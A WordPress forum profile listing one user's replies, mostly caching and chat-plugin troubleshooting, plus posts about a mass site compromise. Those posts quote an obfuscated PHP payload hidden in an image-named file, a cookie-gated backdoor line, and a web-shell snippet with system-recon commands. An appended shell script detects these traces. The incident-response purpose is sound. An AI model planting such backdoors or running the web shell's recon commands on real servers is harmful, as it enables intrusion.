appleo
Forum Replies Created
Forum: Fixing WordPress
In reply to: [Plugin: WP Super Cache] Caches / always
PS — I would suggest this become part of a base install, if ‘index.php’ is being included as an exception.
Forum: Fixing WordPress
In reply to: [Plugin: WP Super Cache] Caches / always
A better use of regular expressions does work:
^/$.
Forum: Plugins
In reply to: [Plugin: WP Super Cache] 403’s
This was the result of upstream .htaccess rules that were blocking certain file types in wp-content/*. There were various exceptions and depending on how I was testing, I was hitting the exceptions. ugh.
Forum: Plugins
In reply to: [Plugin: WP Super Cache] New Installation not caching
I found the answer in readme.txt. The WP_CACHE setting has to be defined in wp-config.php, and must come before the line with wp-settings.php. That did it for me. I had several permissions-related errors before that, but they were well reported in the Admin, so it was obvious what to fix.
Forum: Plugins
In reply to: [Plugin: WP Super Cache] New Installation not caching
Problem WAS:
define( 'WP_CACHE', true );
was below wp-settings.php.
Forum: Plugins
In reply to: [Plugin: WP-AddonChat] WP-Addonchat Java Error
The final resolution is that what we really wanted for this site was “automatic login” and not just remote login, which is available through this plugin. We have a private area where clients are already logged in. Getting the automatic functionality required additional params to the applet code, and then customizing ras.php to handle the “automatic” authentication so that users login just once. Happy campers now :)
Forum: Plugins
In reply to: [Plugin: WP-AddonChat] WP-Addonchat Java Error
The above issue was caused by a mismatch in the addonchat Control Panel and WP-AddonChat. That is resolved. What I have now is users that have to login twice — once for the site (the chat is in a private area of the site), and once for the chat itself. The chat login is authenticated via WordPress now. So maybe this is how the plugin is designed to work, but what I want is an automatic login so that the user has to only supply the same information once.
Forum: Plugins
In reply to: [Plugin: WP-AddonChat] WP-Addonchat Java Error
Followup …
One problem solved … WP was apparently taking the generated html from addonchat_shortcode() and adding <br /> tags at each newline, which was causing the java error. After correcting that, I am getting a login prompt from addonchat, with a message that says unable to contact server. I am hoping to avoid the login prompt. I guess I am waiting to see if that is a transient problem or something else.
Forum: Fixing WordPress
In reply to: Security issue, multiple sites
So far I have found 3 of these files. All are exactly 11128 bytes. Two had identical content, but not the third. Two were in non-WP directories (one was in an Apache log directory). All had image-like names (one was jpg, one was jpeg and one png). I don’t know if this is the end of this trail or not.
Forum: Fixing WordPress
In reply to: Security issue, multiple sites
The plot thickens. Have you looked at 404_old.gif? Reading your post, I picked one site, and also found a bogus theme: comments-popup_old.png (also an image name … hmmmm). Here is a snippet from that odd-looking content:
<?/*?#?#,,sess,ykpIjdjU051SXpKZzBESXU5V2F6SlhaMjlGYzNSaUNOc2pidm yY3l b RmQjNka0FDYmhKMmJzZG1DTjBuQ05zVEtvUVhhNFZXQ0s d09 OEdkZlIz xK GFrVm1ja2dDZGp b N UldaeTlGYzNsZ0NOQUNJZ0FDS dBU0NLMHdPZGR5YjA5RmRqVm1jcFJX nlkeVdVTlZSVkZ UlM5RkpnMERJdlIz DBOV1p5bEdabEpISmdrQ0l MDFKdlIz DBOV1p5bEdabEozSmJSMVVGVlZVRkox GtnQ2RsTjNjcEJDS2dZV2FKb1FEN2NDY29Cbkx1bDJadnhXTHdkM0x1NHlKZzBESXZSM1g
This file is timestamped April 11th. I’ll look for more later. There probably are many more left to unearth.
Forum: Fixing WordPress
In reply to: Security issue, multiple sites
No real answers here either. This is just to confirm a similar situation. A server with 100+ vhosted accounts, and almost all the wordpress installations (various versions thru 2.5) were seemingly hit. All on the 11th, and every one within several minutes, according to timestamps. Which would seem to argue for a single point of entry. But the sheer volume (hundreds of files) might suggest otherwise. Almost everything was either a wordpress file, or something disguised to look like a wordpress file. The script did look for writable areas, and occasionally found non-wordpress stuff, but that was the exception. There were two signatures. Files altered as FPMSummer posted with the first line changed. And new files where all the voodoo was (422 lines), with the first line:
<?php if(md5($_COOKIE['qwerty'])=="dfa1bcf40aa72fdb46ed40f7651fe76e"){
I believe all of these were ‘qwerty’ cookies. Grepping for either of those cookie names will find all the filesystem damage. A sample of that code:
if(!$safe_mode){
    if($os_type == 'nix'){
        $os .= execute('sysctl -n kern.ostype');
        $os .= execute('sysctl -n kern.osrelease');
        $os .= execute('sysctl -n kernel.ostype');
        $os .= execute('sysctl -n kernel.osrelease');
        if(empty($user)) $user = execute('id');
        $aliases = array(
            '' => '',
            'find suid files'=>'find / -type f -perm -04000 -ls',
            'find sgid files'=>'find / -type f -perm -02000 -ls',
            'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
            'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
            'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
            'show opened ports'=>'netstat -an | grep -i listen',
        );
    }else{
        $os_name .= execute('ver');
        $user .= execute('echo %username%');
        $aliases = array(
            '' => '',
            'show runing services' => 'net start',
            'show process list' => 'tasklist'
        );
    }
}
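
The filesystem sweep suggested in the posts above, written out as an added example that is not part of the original posts: it looks for the MD5-hashed cookie gate, PHP content hidden behind image file names, and files of the reported 11128-byte size. The function names are hypothetical, and it assumes a grep that supports -r and a find that supports -iname.

```sh
#!/bin/sh
# Added example, not code from the forum posts. Function names are hypothetical.
# Assumes a grep with -r and a find with -iname (GNU and BSD both qualify).

# 1. Files containing a gate on an MD5-hashed cookie, the construct quoted in
#    the post. Matching the construct, not one cookie name, catches renames.
COOKIE_GATE_RE='md5\(\$_COOKIE\[[^]]+]\)[[:space:]]*==[[:space:]]*["'\''][0-9a-f]{32}["'\'']'

scan_cookie_gate() {
    grep -rlE -e "$COOKIE_GATE_RE" "$1" 2>/dev/null | sort
}

# 2. Files with an image extension whose first two bytes are "<?" (a PHP open
#    tag) rather than an image signature.
scan_fake_images() {
    find "$1" -type f \( -iname '*.gif' -o -iname '*.jpg' \
            -o -iname '*.jpeg' -o -iname '*.png' \) \
        -exec sh -c 'for f do
            if [ "$(head -c 2 "$f" | tr -d "\000")" = "<?" ]; then
                printf "%s\n" "$f"
            fi
        done' sh {} + | sort
}

# 3. Files of one exact byte size (11128 is the size reported in the posts).
scan_exact_size() {
    find "$1" -type f -size "${2:-11128}c" | sort
}

sweep_webroot() {
    echo "== cookie-gated PHP ==";        scan_cookie_gate "$1"
    echo "== PHP behind image names ==";  scan_fake_images "$1"
    echo "== exact-size files ==";        scan_exact_size "$1" "${2:-11128}"
}

# Usage: sh sweep.sh /path/to/webroot [size-in-bytes]
if [ "$#" -ge 1 ]; then
    sweep_webroot "$@"
fi
```

An exact size match is a weak indicator on its own, so treat the third list as leads to inspect and the first two as the stronger signals.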